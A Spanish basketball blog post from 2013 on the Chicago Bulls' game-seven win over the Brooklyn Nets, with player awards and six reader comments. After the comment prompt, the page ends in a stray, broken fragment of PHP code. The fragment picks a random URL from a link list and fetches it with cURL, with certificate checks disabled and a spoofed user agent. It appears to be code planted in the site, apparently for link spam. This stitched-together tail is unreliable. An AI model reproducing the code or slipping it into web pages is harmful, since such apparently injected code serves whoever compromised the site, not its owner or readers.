La Crónica: Resiliencia

05 de May de 2013 por txusma

El término resiliencia se refiere a la capacidad de los sujetos para sobreponerse a períodos de dolor emocional y traumas. Es la capacidad de afrontar la adversidad saliendo fortalecido y alcanzando un estado de excelencia profesional y personal.

Si en un futuro alguno de vosotros organiza unas jornadas sobre la resiliencia bien haría en invitar como conferenciante a toda la plantilla de los Bulls o si el presupuesto no permite tantas alegrías, a Joakim Noah. Tras ver el partido de ayer resulta fácil olvidar que hace poco más de 2 semanas, el ex de la Universidad de Florida tan solo pudo disputar 14 minutos del primer partido de la serie aquejado todavía de fuertes dolores en el pie por culpa de una fascitis plantar. Ayer jugó 41 y dejó para la posteridad una de esas hojas estadísticas históricas (24 puntos, 14 rebotes y 6 tapones). Larga vida a Joakim Noah.

Tras perder el sexto partido en casa y llegar a Brooklyn con las bajas de Deng y Hinrich, más la ya conocida de Derrick Rose, creo que pocos confiaban en que los Bulls pudieran imponerse a un equipo construido a base de talonario. Craso error. Chicago salió como un tiro y la inexistente defensa de los Nets les permitió irse al descanso con 17 puntos de ventaja. Los Nets se sacudieron de encima la presión en el tercer cuarto y empezaron a anotar con fluidez lo que les permitió recortar la ventaja hasta los 7 puntos. Se suponía que, jugando el partido fuera de casa y plagados de bajas, el último cuarto se le tenía que hacer muy largo a los Bulls pero no fue así. Belinelli y compañía no permitieron que los Nets se acercaran nunca a menos de 5 puntos y mantuvieron el tipo ante las acometidas de Deron Williams y Brook Lopez. Un triple fallado por Joe Johnson – desastroso partido el suyo – a falta de 39 segundos certificó prácticamente la victoria y el pase a la 2ª ronda. 

PREMIOS

MVP: 24 puntos con un 12 de 17 en tiros de campo, 14 rebotes y 6 tapones. Joakim Noah jugó uno de sus mejores partidos justamente cuando más le necesitaba su equipo y con su actitud y energía contagió a sus compañeros.

Sorpresa: Marco Belinelli se licenció en el partido de ayer. Seguramente pocos le veíamos integrado en el estilo de juego de los Bulls a principio de temporada pero anoche fue clave con 24 puntos, varios de ellos en el último cuarto.

Decepción: ¿En qué situación queda Joe Johnson tras el partido de ayer? Se quedó en 6 puntos con un  terrible 2 de 14 en tiros de campo.

Esfuerzo en vano: Deron Williams contempló ayer cómo naufraga el millonario proyecto a las primeras de cambio. Sus 24 puntos, 6 rebotes y 7 asistencias no consiguieron mantener a flote el barco.

Imágenes | AP Photos / Getty Images

Comenta

6 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    Alé, a tomar x culo los millonarios. Eso pasa por hacer equipos a base de talonario sin ningún sentido ni armonía. Como dijo Gerald Wallace hace unos días… no sé qué coño pinto yo aquí!! Vuelve a SacTown!!

      Citar

  2. MagicJohnson32 dice:
    #2

    Ahora es cuando se lesionan Boozer y Noah, y los Bulls ganan a los Heat con Mohammed y Radmanovic de titulares.

      Citar

  3. txusma dice:
    #3

    MagicJohnson32:
    Ahora es cuando se lesionan Boozer y Noah, y los Bulls ganan a los Heat con Mohammed y Radmanovic de titulares.

    Más difícil todavía!

      Citar

  4. nba dice:
    #4

    Joder de que pasta esta hecho Noah, mecaguen en la mar, lo que puede ser este equipo con Rose al frente….
    Como se nota cuando hay un entrenador respetado por sus jugadores, en el que todos creen.
    No se porque pero a mi lo de Nate, me suena a que esta preparandose para unos cuantos años de “cazo-mix”

      Citar

  5. rumbero dice:
    #5

    nba:
    No se porque pero a mi lo de Nate, me suena a que esta preparandose para unos cuantos años de “cazo-mix”

    A mi Robinson siempre me ha parecido que se busca la vida como puede. Difícil encontrar acomodo siendo el jugador que es, para lo bueno y para lo malo, pero el tio suele echarle bastantes huevos (numeritos y bailecitos aparte). Con la serie que ha hecho se ha ganado que le den un buen contratito creo yo y con bastante justicia.
    Y estos Bulls son la leche y Noah más! Lo que hicieron ayer es para quitarse el sombrero, con medio equipo titular fuera y el otro lesionado pero cascándose casi todo el partido para ganarles a los ricos de Brooklyn con todo el equipo sano, ese presupuesto y en su casa. Lo que se ha comentado ya, mucho supuesto buen jugador pero sin tener muy claro a que juega. Salvaría a Lopez que sin ser un jugador de mi agrado ha sido de lo mejorcito de los Nets y se le ve una progresión y al pobre Wallace que ayer intentó darle la vuelta al partido pero como dice él mismo, parece que a ratos va bastante perdido entre castaña y casaña de Jojo.

    En Miami no tendran miedo a nada, pero seguro seguro que hubieran estado más tranquilos con los Nets.

      Citar

  6. GreenPride dice:
    #6

    Pues revolcón en toda regla la que se ha llevado el proyecto de Brooklyn a las primeras de cambio. Unos Bulls al completo para mí son más equipo que los Nets pero estos Bulls sin Deng, Rose ni Hinrich ni de largo son mejores si además pierdes el 7º en casa un desastre total.
    El partido retrató una vez más a JoJo el día más importante del año aunque sin ser injustos con él ha dado la cara en casi todos los finales apretados de la serie. Aún así ha quedado claro que no justifica el pastón que cobra. Pero al margen de esto queda claro que los Bulls han ganado por corazón. El que le ponen gente como Robinson, Butler y por encima de todos Noah. Partidazo increible el suyo cerrando su aro y siendo muy valiente en ataque. Él sabe sus limitaciones pero con fé y determinación le sacó los colores a Lopez que todos sabemos que no es precisamente un fiero defensor. Increíble también Belinelli, que empezó casi sin jugar en las series y ha acabado siendo decisivo, eso son los Bulls si uno se lesiona pues sale otro y lo hace fenomenal. Mucho que pensar para los Nets esta postemporada. Y para los Bulls nada que perder ante los todopoderosos Heat. ¿Reaparecerá Rose en estas series? … Sería la monda
    Para los Bulls, intentar

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>